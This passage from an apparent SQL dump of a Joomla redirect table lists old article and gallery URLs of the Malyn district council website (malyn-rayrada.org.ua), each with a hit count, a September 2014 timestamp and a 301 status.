00:00:00',301),(3246,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1036:2013-06-25-10-02-48&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-09-20 18:09:33','0000-00-00 00:00:00',301),(3247,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1170:2014-01-08-11-02-06&catid=11&lang=uk&Itemid=','','','',2,0,'2014-09-20 18:10:05','0000-00-00 00:00:00',301),(3248,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=923:-17-&catid=11&lang=en&Itemid=','','','',1,0,'2014-09-20 18:10:56','0000-00-00 00:00:00',301),(3249,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=972:2013-03-19-10-50-05&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',2,0,'2014-09-20 18:11:40','0000-00-00 00:00:00',301),(3250,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1140:80-1932-33-l-r&catid=11&lang=en','','','',2,0,'2014-09-20 18:11:57','0000-00-00 00:00:00',301),(3251,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1075:2013-09-06-09-25-33&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-09-20 18:11:59','0000-00-00 00:00:00',301),(3252,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1346:2014-06-18-11-51-53&catid=11&lang=ru&Itemid=','','','',2,0,'2014-09-20 18:12:03','0000-00-00 00:00:00',301),(3253,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=945:2013-03-04-07-28-58&catid=49:--12042013-&Itemid=88&lang=en','','','',8,0,'2014-09-20 18:12:12','0000-00-00 00:00:00',301),(3254,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1012:l-r&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-09-20 18:15:09','0000-00-00 00:00:00',301),(3255,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=923:-17-&catid=11&lang=en&Itemid=0','','','',1,0,'2014-09-20 18:17:56','0000-00-00 00:00:00',301),(3256,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1170:2014-01-08-11-02-06&catid=11&lang=ru&Itemid=','','','',3,0,'2014-09-20 18:19:00','0000-00-00 00:00:00',301),(3257,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1021:-l-r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',2,0,'2014-09-20 18:21:06','0000-00-00 00:00:00',301),(3258,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1140:80-1932-33-l-r&catid=11&lang=en&Itemid=','','','',4,0,'2014-09-20 18:21:47','0000-00-00 00:00:00',301),(3259,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1140:80-1932-33-l-r&catid=11&lang=en&Itemid=','','','',2,0,'2014-09-20 18:21:55','0000-00-00 00:00:00',301),(3260,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=893:-2013-2014-&catid=36&Itemid=70&lang=ru','','','',3,0,'2014-09-20 18:28:34','0000-00-00 00:00:00',301),(3261,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1053:2013-07-19-11-34-22&catid=51:--19072013-&Itemid=92&lang=en','','','',5,0,'2014-09-20 18:30:19','0000-00-00 00:00:00',301),(3262,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=946:-l-r-2011-2015-&catid=36&Itemid=70&lang=ru','','','',3,0,'2014-09-20 18:30:55','0000-00-00 00:00:00',301),(3263,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=844:------------2013--&catid=36&Itemid=70&lang=ru','','','',2,0,'2014-09-20 18:31:03','0000-00-00 00:00:00',301),(3264,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=958:------------2010-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',2,0,'2014-09-20 18:31:12','0000-00-00 00:00:00',301),(3265,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=972:2013-03-19-10-50-05&catid=36&Itemid=70&lang=ru','','','',2,0,'2014-09-20 18:31:15','0000-00-00 00:00:00',301),(3266,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1092:2013-09-19-12-18-37&catid=36&Itemid=70&lang=en','','','',7,0,'2014-09-20 18:31:36','0000-00-00 00:00:00',301),(3267,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=923:-17-&catid=11&lang=en&Itemid=0','','','',1,0,'2014-09-20 18:33:24','0000-00-00 00:00:00',301),(3268,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1241:2014-03-17-07-05-06&catid=57:--15042014-&Itemid=98&lang=uk','','','',1,0,'2014-09-20 18:34:55','0000-00-00 00:00:00',301),(3269,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=946:-l-r-2011-2015-&catid=36&Itemid=70&lang=uk','','','',2,0,'2014-09-20 18:35:35','0000-00-00 00:00:00',301),(3270,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1346:2014-06-18-11-51-53&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-20 18:43:58','0000-00-00 00:00:00',301),(3271,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1241:2014-03-17-07-05-06&catid=57:--15042014-&Itemid=98&lang=ru','','','',5,0,'2014-09-20 18:44:09','0000-00-00 00:00:00',301),(3272,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1064:2013-08-09-07-52-21&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2014-09-20 18:48:54','0000-00-00 00:00:00',301),(3273,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1324:2014-05-27-13-24-07&catid=36&Itemid=70&lang=ru','','','',1,0,'2014-09-20 18:49:26','0000-00-00 00:00:00',301),(3274,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1324:2014-05-27-13-24-07&catid=36&Itemid=70&lang=uk','','','',3,0,'2014-09-20 18:51:10','0000-00-00 00:00:00',301),(3275,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1053:2013-07-19-11-34-22&catid=51&Itemid=92&lang=en','','','',11,0,'2014-09-20 18:52:20','0000-00-00 00:00:00',301),(3276,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1047:2013-07-10-05-51-36&catid=51:--19072013-&Itemid=92&lang=uk','','','',2,0,'2014-09-20 18:53:49','0000-00-00 00:00:00',301),(3277,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1186:-2013-i-2014-&catid=56:--03022014-&Itemid=97&lang=uk','','','',3,0,'2014-09-20 18:56:34','0000-00-00 00:00:00',301),(3278,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=945:2013-03-04-07-28-58&catid=49&Itemid=88&lang=en','','','',1,0,'2014-09-20 18:58:59','0000-00-00 00:00:00',301),(3279,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1346:2014-06-18-11-51-53&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-20 18:59:24','0000-00-00 00:00:00',301),(3280,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1078:-2007-2015-&catid=53:--25102013-&Itemid=94&lang=ru','','','',5,0,'2014-09-20 19:00:14','0000-00-00 00:00:00',301),(3281,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1078:-2007-2015-&catid=36&Itemid=70&lang=ru','','','',8,0,'2014-09-20 19:03:42','0000-00-00 00:00:00',301),(3282,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=946:-----l-r--2011--2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',1,0,'2014-09-20 19:05:31','0000-00-00 00:00:00',301),(3283,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1121:--24--6-&catid=11&Itemid=14&lang=ru','','','',8,0,'2014-09-20 19:06:15','0000-00-00 00:00:00',301),(3284,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1047:2013-07-10-05-51-36&catid=51:--19072013-&Itemid=92&lang=ru','','','',2,0,'2014-09-20 19:07:58','0000-00-00 00:00:00',301),(3285,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1170:2014-01-08-11-02-06&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-09-20 19:08:37','0000-00-00 00:00:00',301),(3286,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1329:2014-06-02-11-51-47&catid=11&Itemid=14&lang=ru','','','',7,0,'2014-09-20 19:09:09','0000-00-00 00:00:00',301),(3287,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1128:2013-11-06-13-04-56&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',8,0,'2014-09-20 19:10:23','0000-00-00 00:00:00',301),(3288,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1170:2014-01-08-11-02-06&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-09-20 19:14:20','0000-00-00 00:00:00',301),(3289,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1071:2013-08-27-14-06-18&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',6,0,'2014-09-20 19:15:38','0000-00-00 00:00:00',301),(3290,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=945:2013-03-04-07-28-58&catid=49:--12042013-&Itemid=88&lang=en','','','',2,0,'2014-09-20 19:15:39','0000-00-00 00:00:00',301),(3291,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1091:2013-09-19-12-13-07&catid=53&Itemid=94&lang=uk','','','',5,0,'2014-09-20 19:16:37','0000-00-00 00:00:00',301),(3292,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1128:2013-11-06-13-04-56&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2014-09-20 19:19:26','0000-00-00 00:00:00',301),(3293,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1121:-24-6-&catid=11&lang=uk','','','',4,0,'2014-09-20 19:20:44','0000-00-00 00:00:00',301),(3294,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1019:2013-06-06-11-26-38&catid=36&Itemid=70&lang=en','','','',1,0,'2014-09-20 19:20:53','0000-00-00 00:00:00',301),(3295,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1121:-24-6-&catid=11&lang=uk&Itemid=','','','',2,0,'2014-09-20 19:21:21','0000-00-00 00:00:00',301),(3296,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1121:-24-6-&catid=11&lang=uk','','','',5,0,'2014-09-20 19:25:23','0000-00-00 00:00:00',301),(3297,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1039:---------------l-r&catid=36&Itemid=70&lang=uk','','','',3,0,'2014-09-20 19:25:36','0000-00-00 00:00:00',301),(3298,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1219:-2004-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2014-09-20 19:25:42','0000-00-00 00:00:00',301),(3299,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1033:2013-06-18-12-58-36&catid=36&Itemid=70&lang=uk','','','',2,0,'2014-09-20 19:25:45','0000-00-00 00:00:00',301),(3300,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1217:2014-02-21-13-52-36&catid=11&Itemid=14&lang=en','','','',12,0,'2014-09-20 19:26:28','0000-00-00 00:00:00',301),(3301,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1224:----25--2014-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',11,0,'2014-09-20 19:26:40','0000-00-00 00:00:00',301),(3302,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1047:2013-07-10-05-51-36&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',5,0,'2014-09-20 19:26:45','0000-00-00 00:00:00',301),(3303,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=928:2013-02-21-09-10-17&catid=47:-21022013-&Itemid=86&lang=en','','','',4,0,'2014-09-20 19:26:54','0000-00-00 00:00:00',301),(3304,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1315:-31-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-20 19:27:04','0000-00-00 00:00:00',301),(3305,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1318:----3110&catid=36&Itemid=70&lang=uk','','','',3,0,'2014-09-20 19:27:06','0000-00-00 00:00:00',301),(3306,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1019:2013-06-06-11-26-38&catid=51:--19072013-&Itemid=92&lang=en','','','',2,0,'2014-09-20 19:29:35','0000-00-00 00:00:00',301),(3307,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1223:--28-----6-&catid=11&Itemid=14&lang=ru','','','',4,0,'2014-09-20 19:30:06','0000-00-00 00:00:00',301),(3308,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1317:2014-05-25-18-25-09&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',5,0,'2014-09-20 19:31:41','0000-00-00 00:00:00',301),(3309,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1193:-2014-2015-&catid=56&Itemid=97&lang=uk','','','',6,0,'2014-09-20 19:32:26','0000-00-00 00:00:00',301),(3310,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=936:2013-02-21-09-43-43&catid=47&Itemid=86&lang=ru','','','',6,0,'2014-09-20 19:32:47','0000-00-00 00:00:00',301),(3311,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1184:----27----6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-09-20 19:33:22','0000-00-00 00:00:00',301),(3312,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=928:2013-02-21-09-10-17&catid=47&Itemid=86&lang=uk','','','',6,0,'2014-09-20 19:33:37','0000-00-00 00:00:00',301),(3313,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1097:2013-09-25-08-35-50&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2014-09-20 19:34:21','0000-00-00 00:00:00',301),(3314,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=907:2013-01-21-08-54-59&catid=47:--21022013-&Itemid=86&lang=uk','','','',5,0,'2014-09-20 19:34:31','0000-00-00 00:00:00',301),(3315,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1240:2014-03-17-07-01-32&catid=57&Itemid=98&lang=uk','','','',1,0,'2014-09-20 19:35:30','0000-00-00 00:00:00',301),(3316,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1290:2014-04-23-06-56-41&catid=10&Itemid=17&lang=uk','','','',7,0,'2014-09-20 19:35:38','0000-00-00 00:00:00',301),(3317,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1111:2013-10-22-16-06-36&catid=11&lang=uk','','','',6,0,'2014-09-20 19:35:42','0000-00-00 00:00:00',301),(3318,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=903:-2012-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2014-09-20 19:36:27','0000-00-00 00:00:00',301),(3319,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=943:-qq&catid=11&lang=ru','','','',4,0,'2014-09-20 19:36:45','0000-00-00 00:00:00',301),(3320,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1317:2014-05-25-18-25-09&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',8,0,'2014-09-20 19:37:04','0000-00-00 00:00:00',301),(3321,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=884:2012-12-24-10-46-13&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',6,0,'2014-09-20 19:37:23','0000-00-00 00:00:00',301),(3322,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1193:-2014-2015-&catid=56:--03022014-&Itemid=97&lang=uk','','','',9,0,'2014-09-20 19:37:29','0000-00-00 00:00:00',301),(3323,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=1&Itemid=0&lang=uk','','','',8,0,'2014-09-20 19:40:10','0000-00-00 00:00:00',301),(3324,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=4:2010-06-05-12-51-18&layout=blog&Itemid=8&lang=ru','','','',19,0,'2014-09-20 19:40:47','0000-00-00 00:00:00',301),(3325,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=963:2013-03-13-06-16-53&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-20 19:40:57','0000-00-00 00:00:00',301),(3326,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=911:2013-01-22-13-27-41&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-09-20 19:41:02','0000-00-00 00:00:00',301),(3327,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=960:-19-&catid=11&lang=en&Itemid=','','','',2,0,'2014-09-20 19:41:13','0000-00-00 00:00:00',301),(3328,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=943:-qq&catid=11&lang=uk&Itemid=','','','',1,0,'2014-09-20 19:42:08','0000-00-00 00:00:00',301),(3329,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1207:-2007-2015-&catid=56:--03022014-&Itemid=97&lang=uk','','','',4,0,'2014-09-20 19:42:51','0000-00-00 00:00:00',301),(3330,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1290:2014-04-23-06-56-41&catid=10:2010-06-05-13-46-44&Itemid=17&lang=ru','','','',4,0,'2014-09-20 19:42:57','0000-00-00 00:00:00',301),(3331,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1274:-l-r&catid=57&Itemid=98&lang=ru','','','',3,0,'2014-09-20 19:43:58','0000-00-00 00:00:00',301),(3332,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1274:-l-r&catid=57&Itemid=98&lang=ru','','','',10,0,'2014-09-20 19:45:51','0000-00-00 00:00:00',301),(3333,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=2&Itemid=32&lang=en','','','',2,0,'2014-09-20 19:46:43','0000-00-00 00:00:00',301),(3334,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=986:-20-&catid=11&lang=en&Itemid=0','','','',3,0,'2014-09-20 19:47:34','0000-00-00 00:00:00',301),(3335,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=942:-19-6-&catid=11&lang=en&Itemid=0','','','',1,0,'2014-09-20 19:48:38','0000-00-00 00:00:00',301),(3336,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=1&Itemid=0&lang=uk','','','',4,0,'2014-09-20 19:49:24','0000-00-00 00:00:00',301),(3337,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1324:2014-05-27-13-24-07&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',3,0,'2014-09-20 19:49:50','0000-00-00 00:00:00',301),(3338,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1184:----27----6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-09-20 19:50:28','0000-00-00 00:00:00',301),(3339,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=986:-20-&catid=11&lang=en&Itemid=','','','',1,0,'2014-09-20 19:50:38','0000-00-00 00:00:00',301),(3340,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1111:2013-10-22-16-06-36&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-09-20 19:50:44','0000-00-00 00:00:00',301),(3341,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1207:-2007-2015-&catid=56&Itemid=97&lang=uk','','','',4,0,'2014-09-20 19:51:29','0000-00-00 00:00:00',301),(3342,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1207:-2007-2015-&catid=56:--03022014-&Itemid=97&lang=ru','','','',5,0,'2014-09-20 19:51:32','0000-00-00 00:00:00',301),(3343,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=903:-2012-&catid=11&Itemid=14&lang=en','','','',2,0,'2014-09-20 19:52:24','0000-00-00 00:00:00',301),(3344,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1121:-24-6-&catid=11&lang=ru&Itemid=','','','',3,0,'2014-09-20 19:53:15','0000-00-00 00:00:00',301),(3345,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=986:-20-&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-20 19:53:51','0000-00-00 00:00:00',301),(3346,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=928:2013-02-21-09-10-17&catid=47&Itemid=86&lang=ru','','','',6,0,'2014-09-20 19:53:55','0000-00-00 00:00:00',301),(3347,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1324:2014-05-27-13-24-07&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',2,0,'2014-09-20 19:54:32','0000-00-00 00:00:00',301),(3348,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1099:-l-r&catid=53:--25102013-&Itemid=94&lang=ru','','','',7,0,'2014-09-20 19:55:21','0000-00-00 00:00:00',301),(3349,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=928:2013-02-21-09-10-17&catid=47&Itemid=86&lang=en','','','',1,0,'2014-09-20 19:57:25','0000-00-00 00:00:00',301),(3350,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1164:2013-12-29-11-46-36&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',7,0,'2014-09-20 20:01:09','0000-00-00 00:00:00',301),(3351,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1047:2013-07-10-05-51-36&catid=36&Itemid=70&lang=en','','','',2,0,'2014-09-20 20:03:10','0000-00-00 00:00:00',301),(3352,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1273:2014-04-10-06-15-24&catid=36&Itemid=70&lang=uk','','','',3,0,'2014-09-20 20:07:00','0000-00-00 00:00:00',301),(3353,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=991:2013-04-22-08-24-54&catid=11&Itemid=14&lang=en','','','',5,0,'2014-09-20 20:09:21','0000-00-00 00:00:00',301),(3354,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1240:2014-03-17-07-01-32&catid=57:--15042014-&Itemid=98&lang=uk','','','',1,0,'2014-09-20 20:09:26','0000-00-00 00:00:00',301),(3355,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1207:-----------------2007-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',14,0,'2014-09-20 20:09:35','0000-00-00 00:00:00',301),(3356,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=887:-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2014-09-20 20:09:39','0000-00-00 00:00:00',301),(3357,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1164:2013-12-29-11-46-36&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',7,0,'2014-09-20 20:09:51','0000-00-00 00:00:00',301),(3358,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=943:-qq&catid=11&lang=ru&Itemid=','','','',1,0,'2014-09-20 20:10:20','0000-00-00 00:00:00',301),(3359,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1070:2013-08-23-04-27-00&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-09-20 20:11:05','0000-00-00 00:00:00',301),(3360,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=985:2013-04-12-09-53-08&catid=49&Itemid=88&lang=uk','','','',6,0,'2014-09-20 20:11:54','0000-00-00 00:00:00',301),(3361,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=985:2013-04-12-09-53-08&catid=49&Itemid=88&lang=ru','','','',2,0,'2014-09-20 20:12:03','0000-00-00 00:00:00',301),(3362,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1290:2014-04-23-06-56-41&catid=10&Itemid=17&lang=uk','','','',5,0,'2014-09-20 20:13:25','0000-00-00 00:00:00',301),(3363,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1290:2014-04-23-06-56-41&catid=10&Itemid=17&lang=ru','','','',2,0,'2014-09-20 20:13:29','0000-00-00 00:00:00',301),(3364,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=928:2013-02-21-09-10-17&catid=47:-21022013-&Itemid=86&lang=en','','','',4,0,'2014-09-20 20:14:14','0000-00-00 00:00:00',301),(3365,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1021:---l---r&catid=36&Itemid=70&lang=ru','','','',2,0,'2014-09-20 20:16:28','0000-00-00 00:00:00',301),(3366,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=884:2012-12-24-10-46-13&catid=11&Itemid=14&lang=en','','','',3,0,'2014-09-20 20:20:26','0000-00-00 00:00:00',301),(3367,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1111:2013-10-22-16-06-36&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-09-20 20:20:33','0000-00-00 00:00:00',301),(3368,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1144:-lr&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',2,0,'2014-09-20 20:20:42','0000-00-00 00:00:00',301),(3369,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1207:-2007-2015-&catid=56&Itemid=97&lang=ru','','','',3,0,'2014-09-20 20:21:46','0000-00-00 00:00:00',301),(3370,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1098:2013-09-25-09-34-57&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2014-09-20 20:21:49','0000-00-00 00:00:00',301),(3371,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1286:2014-04-23-06-48-27&catid=10:2010-06-05-13-46-44&Itemid=17&lang=ru','','','',2,0,'2014-09-20 20:22:01','0000-00-00 00:00:00',301),(3372,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=943:-qq&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-09-20 20:25:27','0000-00-00 00:00:00',301),(3373,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1031:2013-06-17-06-49-26&catid=36&Itemid=70&lang=uk','','','',2,0,'2014-09-20 20:26:01','0000-00-00 00:00:00',301),(3374,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1120:2013-10-25-12-32-17&catid=53:--25102013-&Itemid=94&lang=en','','','',4,0,'2014-09-20 20:26:03','0000-00-00 00:00:00',301),(3375,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1029:2013-06-17-06-34-51&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',4,0,'2014-09-20 20:26:06','0000-00-00 00:00:00',301),(3376,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=912:2013-01-22-14-14-06&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-09-20 20:26:14','0000-00-00 00:00:00',301),(3377,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=897:2013-01-18-07-40-55&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',1,0,'2014-09-20 20:26:20','0000-00-00 00:00:00',301),(3378,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=853:2012-12-11-13-39-46&catid=32&Itemid=64&lang=uk','','','',2,0,'2014-09-20 20:26:22','0000-00-00 00:00:00',301),(3379,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=985:2013-04-12-09-53-08&catid=49&Itemid=88&lang=ru','','','',5,0,'2014-09-20 20:27:10','0000-00-00 00:00:00',301),(3380,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1318:----3110&catid=36&Itemid=70&lang=ru','','','',3,0,'2014-09-20 20:28:19','0000-00-00 00:00:00',301),(3381,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=3&Itemid=1&lang=ru','','','',10,0,'2014-09-20 20:28:52','0000-00-00 00:00:00',301),(3382,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=991:2013-04-22-08-24-54&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2014-09-20 20:30:08','0000-00-00 00:00:00',301),(3383,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1216:-q-q&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',12,0,'2014-09-20 20:32:07','0000-00-00 